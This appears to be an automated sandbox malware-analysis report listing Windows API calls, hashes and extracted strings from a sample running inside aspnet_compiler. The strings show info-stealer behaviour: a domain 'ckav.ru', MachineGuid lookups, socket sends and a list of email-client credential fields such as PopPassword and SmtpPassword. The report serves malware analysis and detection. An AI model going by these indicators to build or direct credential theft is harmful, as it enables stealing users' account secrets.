                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                    APIs
                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreatePointerWrite
                    • String ID:
                    • API String ID: 3672724799-0
                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$CreateFreeProcessThread_wmemset
                    • String ID: ckav.ru
                    • API String ID: 2915393847-2696028687
                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • _wmemset.LIBCMT ref: 0040634F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess_wmemset
                    • String ID: CA
                    • API String ID: 2773065342-1052703068
                    • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                    • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InformationToken
                    • String ID: IDA
                    • API String ID: 4114910276-365204570
                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                    APIs
                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc
                    • String ID: s1@
                    • API String ID: 190572456-427247929
                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateOpenProcessQueryValue
                    • String ID:
                    • API String ID: 1425999871-0
                    • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                    • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                    APIs
                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CheckMembershipToken
                    • String ID:
                    • API String ID: 1351025785-0
                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                    APIs
                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDirectory
                    • String ID:
                    • API String ID: 4241100979-0
                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                    APIs
                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                    APIs
                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                    APIs
                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                    APIs
                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                    APIs
                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                    APIs
                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                    APIs
                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                    APIs
                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                    APIs
                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                    APIs
                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID:
                    • API String ID: 1174141254-0
                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                    APIs
                    • closesocket.WS2_32(00404EB0), ref: 00404DEB
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocket
                    • String ID:
                    • API String ID: 2781271927-0
                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                    APIs
                    • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                    APIs
                    • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                    APIs
                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                    APIs
                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                    APIs
                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040438F
                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                    • VariantInit.OLEAUT32(?), ref: 004043C4
                    • SysAllocString.OLEAUT32(?), ref: 004043CD
                    • VariantInit.OLEAUT32(?), ref: 00404414
                    • SysAllocString.OLEAUT32(?), ref: 00404419
                    • VariantInit.OLEAUT32(?), ref: 00404431
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitVariant$AllocString$CreateInitializeInstance
                    • String ID:
                    • API String ID: 1312198159-0
                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                    • API String ID: 0-2111798378
                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                    Memory Dump Source
                    • Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
